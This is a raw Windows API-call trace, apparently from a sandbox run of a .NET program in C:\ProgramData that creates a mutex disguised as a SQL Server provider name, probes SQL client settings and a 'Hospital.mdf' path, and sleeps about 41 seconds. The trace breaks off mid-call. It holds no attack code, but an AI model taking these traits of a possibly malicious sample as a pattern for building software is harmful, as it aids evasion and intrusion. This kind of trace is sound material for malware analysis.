RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x33d39c | out: phkResult=0x33d39c*=0x2cc) returned 0x0 [0156.486] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x33d3b8, lpData=0x0, lpcbData=0x33d3b4*=0x0 | out: lpType=0x33d3b8*=0x3, lpData=0x0, lpcbData=0x33d3b4*=0x2c) returned 0x0 [0156.486] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x33d3b8, lpData=0x28c58e4, lpcbData=0x33d3b4*=0x2c | out: lpType=0x33d3b8*=0x3, lpData=0x28c58e4*, lpcbData=0x33d3b4*=0x2c) returned 0x0 [0156.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x33d1f0 | out: phkResult=0x33d1f0*=0x2d0) returned 0x0 [0156.487] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x33d20c, lpData=0x0, lpcbData=0x33d208*=0x0 | out: lpType=0x33d20c*=0x4, lpData=0x0, lpcbData=0x33d208*=0x4) returned 0x0 [0156.487] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x33d20c, lpData=0x33d1f8, lpcbData=0x33d208*=0x4 | out: lpType=0x33d20c*=0x4, lpData=0x33d1f8*=0x7d7, lpcbData=0x33d208*=0x4) returned 0x0 [0156.487] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x33d20c, lpData=0x0, lpcbData=0x33d208*=0x0 | out: lpType=0x33d20c*=0x4, lpData=0x0, lpcbData=0x33d208*=0x4) returned 0x0 [0156.487] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x33d20c, lpData=0x33d1f8, lpcbData=0x33d208*=0x4 | out: lpType=0x33d20c*=0x4, lpData=0x33d1f8*=0x7d8, lpcbData=0x33d208*=0x4) returned 0x0 [0156.487] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x33d20c, lpData=0x0, lpcbData=0x33d208*=0x0 | out: lpType=0x33d20c*=0x3, lpData=0x0, lpcbData=0x33d208*=0x2c) returned 0x0 [0156.488] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x33d20c, lpData=0x28c5e48, lpcbData=0x33d208*=0x2c | out: lpType=0x33d20c*=0x3, lpData=0x28c5e48*, lpcbData=0x33d208*=0x2c) returned 0x0 [0156.488] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x33d20c, lpData=0x0, lpcbData=0x33d208*=0x0 | out: lpType=0x33d20c*=0x3, lpData=0x0, lpcbData=0x33d208*=0x2c) returned 0x0 [0156.488] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x33d20c, lpData=0x28c5f08, lpcbData=0x33d208*=0x2c | out: lpType=0x33d20c*=0x3, lpData=0x28c5f08*, lpcbData=0x33d208*=0x2c) returned 0x0 [0156.488] RegCloseKey (hKey=0x2d0) returned 0x0 [0156.489] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x33d390, lpData=0x0, lpcbData=0x33d38c*=0x0 | out: lpType=0x33d390*=0x1, lpData=0x0, lpcbData=0x33d38c*=0x20) returned 0x0 [0156.489] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x33d390, lpData=0x28c6050, lpcbData=0x33d38c*=0x20 | out: lpType=0x33d390*=0x1, lpData="@tzres.dll,-670", lpcbData=0x33d38c*=0x20) returned 0x0 [0156.489] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x33d390, lpData=0x0, lpcbData=0x33d38c*=0x0 | out: lpType=0x33d390*=0x1, lpData=0x0, lpcbData=0x33d38c*=0x20) returned 0x0 [0156.489] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x33d390, lpData=0x28c60a8, lpcbData=0x33d38c*=0x20 | out: lpType=0x33d390*=0x1, lpData="@tzres.dll,-672", lpcbData=0x33d38c*=0x20) returned 0x0 [0156.489] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x33d390, lpData=0x0, lpcbData=0x33d38c*=0x0 | out: lpType=0x33d390*=0x1, lpData=0x0, lpcbData=0x33d38c*=0x20) returned 0x0 [0156.489] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x33d390, lpData=0x28c6100, lpcbData=0x33d38c*=0x20 | out: lpType=0x33d390*=0x1, lpData="@tzres.dll,-671", lpcbData=0x33d38c*=0x20) returned 0x0 [0156.490] CoTaskMemAlloc (cb=0x20c) returned 0x7b2138 [0156.490] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b2138 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0156.491] CoTaskMemFree (pv=0x7b2138) [0156.492] CoTaskMemAlloc (cb=0x20c) returned 0x7b2138 [0156.492] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x33d3ac, pwszFileMUIPath=0x7b2138, pcchFileMUIPath=0x33d3b0, pululEnumerator=0x33d3a4 | out: pwszLanguage=0x0, pcchLanguage=0x33d3ac, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x33d3b0, pululEnumerator=0x33d3a4) returned 1 [0156.496] CoTaskMemFree (pv=0x0) [0156.496] CoTaskMemFree (pv=0x7b2138) [0156.497] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x440001 [0156.499] CoTaskMemAlloc (cb=0x3ec) returned 0x7b6b68 [0156.499] LoadStringW (in: hInstance=0x440001, uID=0x29e, lpBuffer=0x7b6b68, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0156.499] CoTaskMemFree (pv=0x7b6b68) [0156.500] FreeLibrary (hLibModule=0x440001) returned 1 [0156.500] CoTaskMemAlloc (cb=0x20c) returned 0x7b2138 [0156.500] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b2138 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0156.500] CoTaskMemFree (pv=0x7b2138) [0156.500] CoTaskMemAlloc (cb=0x20c) returned 0x7b2138 [0156.501] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x33d3ac, pwszFileMUIPath=0x7b2138, pcchFileMUIPath=0x33d3b0, pululEnumerator=0x33d3a4 | out: pwszLanguage=0x0, pcchLanguage=0x33d3ac, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x33d3b0, pululEnumerator=0x33d3a4) returned 1 [0156.501] CoTaskMemFree (pv=0x0) [0156.501] CoTaskMemFree (pv=0x7b2138) [0156.501] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x440001 [0156.502] CoTaskMemAlloc (cb=0x3ec) returned 0x7b6b68 [0156.502] LoadStringW (in: hInstance=0x440001, uID=0x2a0, lpBuffer=0x7b6b68, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0156.502] CoTaskMemFree (pv=0x7b6b68) [0156.502] FreeLibrary (hLibModule=0x440001) returned 1 [0156.503] CoTaskMemAlloc (cb=0x20c) returned 0x7b2138 [0156.503] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b2138 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0156.503] CoTaskMemFree (pv=0x7b2138) [0156.503] CoTaskMemAlloc (cb=0x20c) returned 0x7b2138 [0156.503] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x33d3ac, pwszFileMUIPath=0x7b2138, pcchFileMUIPath=0x33d3b0, pululEnumerator=0x33d3a4 | out: pwszLanguage=0x0, pcchLanguage=0x33d3ac, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x33d3b0, pululEnumerator=0x33d3a4) returned 1 [0156.504] CoTaskMemFree (pv=0x0) [0156.504] CoTaskMemFree (pv=0x7b2138) [0156.504] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x440001 [0156.504] CoTaskMemAlloc (cb=0x3ec) returned 0x7b6b68 [0156.505] LoadStringW (in: hInstance=0x440001, uID=0x29f, lpBuffer=0x7b6b68, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0156.505] CoTaskMemFree (pv=0x7b6b68) [0156.505] FreeLibrary (hLibModule=0x440001) returned 1 [0156.505] RegCloseKey (hKey=0x2cc) returned 0x0 [0156.508] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.508] CloseHandle (hObject=0x2c4) returned 1 [0156.508] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28c9c90, cbSid=0x33d678 | out: pSid=0x28c9c90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.508] CreateMutexW (lpMutexAttributes=0x28c9d6c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.509] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.509] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.509] CloseHandle (hObject=0x2c4) returned 1 [0156.509] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28ca4ac, cbSid=0x33d678 | out: pSid=0x28ca4ac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.510] CreateMutexW (lpMutexAttributes=0x28ca588, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.510] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.510] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.510] CloseHandle (hObject=0x2c4) returned 1 [0156.510] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28cacdc, cbSid=0x33d678 | out: pSid=0x28cacdc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.511] CreateMutexW (lpMutexAttributes=0x28cadb8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.511] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.511] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.511] CloseHandle (hObject=0x2c4) returned 1 [0156.511] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28cb510, cbSid=0x33d678 | out: pSid=0x28cb510*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.512] CreateMutexW (lpMutexAttributes=0x28cb5ec, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.512] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.512] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.512] CloseHandle (hObject=0x2c4) returned 1 [0156.513] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28cbd34, cbSid=0x33d678 | out: pSid=0x28cbd34*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.513] CreateMutexW (lpMutexAttributes=0x28cbe10, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.513] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.513] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.513] CloseHandle (hObject=0x2c4) returned 1 [0156.514] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28cc55c, cbSid=0x33d678 | out: pSid=0x28cc55c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.514] CreateMutexW (lpMutexAttributes=0x28cc638, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.514] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.514] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.514] CloseHandle (hObject=0x2c4) returned 1 [0156.515] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28ccd78, cbSid=0x33d678 | out: pSid=0x28ccd78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.515] CreateMutexW (lpMutexAttributes=0x28cce54, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.515] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.515] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.516] CloseHandle (hObject=0x2c4) returned 1 [0156.516] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28cd59c, cbSid=0x33d678 | out: pSid=0x28cd59c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.516] CreateMutexW (lpMutexAttributes=0x28cd678, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.517] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.517] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.517] CloseHandle (hObject=0x2c4) returned 1 [0156.530] GetCurrentProcess () returned 0xffffffff [0156.530] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33d374 | out: TokenHandle=0x33d374*=0x2c4) returned 1 [0156.545] GetCurrentProcess () returned 0xffffffff [0156.545] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33d384 | out: TokenHandle=0x33d384*=0x2cc) returned 1 [0156.564] EtwEventRegister () returned 0x0 [0156.599] GetModuleHandleW (lpModuleName=0x0) returned 0x1380000 [0156.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="_______SQL______Process______Available@0", cchWideChar=40, lpMultiByteStr=0x33e3cc, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x33e388 | out: lpMultiByteStr="_______SQL______Process______Available@0,S)o@!¥(\x94Â5täå3", lpUsedDefaultChar=0x33e388) returned 40 [0156.600] GetProcAddress (hModule=0x1380000, lpProcName="_______SQL______Process______Available@0") returned 0x0 [0156.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="______SQL______Process______Available", cchWideChar=37, lpMultiByteStr=0x33e3d0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x33e38c | out: lpMultiByteStr="______SQL______Process______AvailableS)o@!¥(\x94Â5täå3", lpUsedDefaultChar=0x33e38c) returned 37 [0156.600] GetProcAddress (hModule=0x1380000, lpProcName="______SQL______Process______Available") returned 0x0 [0156.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x33eab8 | out: phkResult=0x33eab8*=0x0) returned 0x2 [0156.606] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x105, lpBuffer=0x33e574, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x0) returned 0xf [0156.611] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Hospital.mdf", nBufferLength=0x105, lpBuffer=0x33e604, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Hospital.mdf", lpFilePart=0x0) returned 0x1b [0156.612] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", ulOptions=0x0, samDesired=0x20019, phkResult=0x33ea98 | out: phkResult=0x33ea98*=0x0) returned 0x2 [0156.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x33ea34 | out: phkResult=0x33ea34*=0x0) returned 0x2 [0156.709] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0156.713] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73390000 [0156.758] AdjustWindowRectEx (in: lpRect=0x33edb0, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x33edb0) returned 1 [0156.760] GetCurrentProcess () returned 0xffffffff [0156.760] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33ecc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33ecc8*=0x304) returned 1 [0156.774] GetCurrentActCtx (in: lphActCtx=0x33ec28 | out: lphActCtx=0x33ec28*=0x0) returned 1 [0156.775] ActivateActCtx (in: hActCtx=0x77396c, lpCookie=0x33ec38 | out: hActCtx=0x77396c, lpCookie=0x33ec38) returned 1 [0156.775] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0156.785] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x72ee0000 [0156.798] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75b00000 [0156.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x33eaf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\"p@!¥(\x94Â5t°ï3", lpUsedDefaultChar=0x0) returned 14 [0156.798] GetProcAddress (hModule=0x75b00000, lpProcName="DefWindowProcW") returned 0x76fd25dd [0156.799] GetStockObject (i=5) returned 0x1900015 [0156.801] GetModuleHandleW (lpModuleName=0x0) returned 0x1380000 [0156.817] CoTaskMemAlloc (cb=0x5a) returned 0x781e98 [0156.817] RegisterClassW (lpWndClass=0x33eae0) returned 0xc120 [0156.817] CoTaskMemFree (pv=0x781e98) [0156.818] GetModuleHandleW (lpModuleName=0x0) returned 0x1380000 [0156.818] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x1380000, lpParam=0x0) returned 0x10150 [0156.819] SetWindowLongW (hWnd=0x10150, nIndex=-4, dwNewLong=1996301789) returned 77006998 [0156.820] GetWindowLongW (hWnd=0x10150, nIndex=-4) returned 1996301789 [0156.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x33e3f0 | out: phkResult=0x33e3f0*=0x318) returned 0x0 [0156.822] RegQueryValueExW (in: hKey=0x318, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x33e410, lpData=0x0, lpcbData=0x33e40c*=0x0 | out: lpType=0x33e410*=0x0, lpData=0x0, lpcbData=0x33e40c*=0x0) returned 0x2 [0156.822] RegQueryValueExW (in: hKey=0x318, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x33e410, lpData=0x0, lpcbData=0x33e40c*=0x0 | out: lpType=0x33e410*=0x0, lpData=0x0, lpcbData=0x33e40c*=0x0) returned 0x2 [0156.822] RegCloseKey (hKey=0x318) returned 0x0 [0156.824] SetWindowLongW (hWnd=0x10150, nIndex=-4, dwNewLong=77007038) returned 1996301789 [0156.824] GetWindowLongW (hWnd=0x10150, nIndex=-4) returned 77007038 [0156.825] GetWindowLongW (hWnd=0x10150, nIndex=-16) returned 113311744 [0156.825] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc121 [0156.826] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc122 [0156.826] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x10150, Msg=0x81, wParam=0x0, lParam=0x33e6bc) returned 0x1 [0156.826] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x10150, Msg=0x83, wParam=0x0, lParam=0x33e6a8) returned 0x0 [0156.827] CallWindowProcW (lpPrevWndFunc=0x76fd25dd, hWnd=0x10150, Msg=0x1, wParam=0x0, lParam=0x33e6bc) returned 0x0 [0156.827] GetClientRect (in: hWnd=0x10150, lpRect=0x33e424 | out: lpRect=0x33e424) returned 1 [0156.827] GetWindowRect (in: hWnd=0x10150, lpRect=0x33e424 | out: lpRect=0x33e424) returned 1 [0156.829] GetParent (hWnd=0x10150) returned 0x0 [0156.829] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1f760001) returned 1 [0157.115] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.116] AdjustWindowRectEx (in: lpRect=0x33ec0c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x33ec0c) returned 1 [0157.123] GetSystemDefaultLCID () returned 0x409 [0157.124] GetStockObject (i=17) returned 0x18a0025 [0157.127] GetObjectW (in: h=0x18a0025, c=92, pv=0x33e9c8 | out: pv=0x33e9c8) returned 92 [0157.128] GetDC (hWnd=0x0) returned 0x40101b8 [0157.172] GdiplusStartup (in: token=0x126030, input=0x33df98, output=0x33dfe8 | out: token=0x126030, output=0x33dfe8) returned 0x0 [0157.198] CoTaskMemAlloc (cb=0x5c) returned 0x781f00 [0157.200] GdipCreateFontFromLogfontW (hdc=0x40101b8, logfont=0x781f00, font=0x33ea90) returned 0x0 [0157.340] CoTaskMemFree (pv=0x781f00) [0157.341] CoTaskMemAlloc (cb=0x5c) returned 0x781f00 [0157.341] CoTaskMemFree (pv=0x781f00) [0157.342] CoTaskMemAlloc (cb=0x5c) returned 0x781f00 [0157.342] CoTaskMemFree (pv=0x781f00) [0157.342] GdipGetFontUnit (font=0x52f2230, unit=0x33ea5c) returned 0x0 [0157.342] GdipGetFontSize (font=0x52f2230, size=0x33ea60) returned 0x0 [0157.342] GdipGetFontStyle (font=0x52f2230, style=0x33ea58) returned 0x0 [0157.342] GdipGetFamily (font=0x52f2230, family=0x33ea54) returned 0x0 [0157.343] GdipGetFontSize (font=0x52f2230, size=0x28d79b8) returned 0x0 [0157.343] ReleaseDC (hWnd=0x0, hDC=0x40101b8) returned 1 [0157.343] GetDC (hWnd=0x0) returned 0xc0107b1 [0157.345] GdipCreateFromHDC (hdc=0xc0107b1, graphics=0x33ea7c) returned 0x0 [0157.346] GdipGetDpiY (graphics=0x548fcf0, dpi=0x28d7ac0) returned 0x0 [0157.346] GdipGetFontHeight (font=0x52f2230, graphics=0x548fcf0, height=0x33ea74) returned 0x0 [0157.346] GdipGetEmHeight (family=0x52ff6b8, style=0, EmHeight=0x33ea7c) returned 0x0 [0157.346] GdipGetLineSpacing (family=0x52ff6b8, style=0, LineSpacing=0x33ea7c) returned 0x0 [0157.346] GdipDeleteGraphics (graphics=0x548fcf0) returned 0x0 [0157.346] ReleaseDC (hWnd=0x0, hDC=0xc0107b1) returned 1 [0157.347] GdipCreateFont (fontFamily=0x52ff6b8, emSize=0x41040000, style=0, unit=0x3, font=0x28d7a80) returned 0x0 [0157.347] GdipGetFontSize (font=0x54e2940, size=0x28d7a84) returned 0x0 [0157.347] GdipDeleteFont (font=0x52f2230) returned 0x0 [0157.349] GetDC (hWnd=0x0) returned 0xc0107b1 [0157.349] GdipCreateFromHDC (hdc=0xc0107b1, graphics=0x33eae0) returned 0x0 [0157.349] GdipGetFontHeight (font=0x54e2940, graphics=0x548fcf0, height=0x33ead8) returned 0x0 [0157.349] GdipDeleteGraphics (graphics=0x548fcf0) returned 0x0 [0157.349] ReleaseDC (hWnd=0x0, hDC=0xc0107b1) returned 1 [0157.350] GetSystemMetrics (nIndex=5) returned 1 [0157.350] GetSystemMetrics (nIndex=6) returned 1 [0157.351] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.352] AdjustWindowRectEx (in: lpRect=0x33ec08, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x33ec08) returned 1 [0157.352] GetDC (hWnd=0x0) returned 0xc0107b1 [0157.352] GdipCreateFromHDC (hdc=0xc0107b1, graphics=0x33eae0) returned 0x0 [0157.352] GdipGetFontHeight (font=0x54e2940, graphics=0x548fcf0, height=0x33ead8) returned 0x0 [0157.352] GdipDeleteGraphics (graphics=0x548fcf0) returned 0x0 [0157.352] ReleaseDC (hWnd=0x0, hDC=0xc0107b1) returned 1 [0157.352] GetSystemMetrics (nIndex=5) returned 1 [0157.352] GetSystemMetrics (nIndex=6) returned 1 [0157.352] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.352] AdjustWindowRectEx (in: lpRect=0x33ec08, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x33ec08) returned 1 [0157.352] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.352] AdjustWindowRectEx (in: lpRect=0x33ec0c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x33ec0c) returned 1 [0157.353] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.353] AdjustWindowRectEx (in: lpRect=0x33ec0c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x33ec0c) returned 1 [0157.353] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.353] AdjustWindowRectEx (in: lpRect=0x33ec08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x33ec08) returned 1 [0157.353] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0157.353] AdjustWindowRectEx (in: lpRect=0x33ec08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x33ec08) returned 1 [0157.366] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0157.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33e960) returned 1 [0157.366] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x33e9dc | out: lpFileInformation=0x33e9dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33e95c) returned 1 [0158.017] SleepEx (dwMilliseconds=0xa21c, bAlertable=1) returned 0x0 [0168.297] GdipLoadImageFromStream (stream=0x4e0030, image=0x33dc60) returned 0x0 [0168.350] GdipImageForceValidation (image=0x548fcf0) returned 0x0 [0168.363] GdipGetImageType (image=0x548fcf0, type=0x33dc5c) returned 0x0 [0168.363] GdipGetImageRawFormat (image=0x548fcf0, 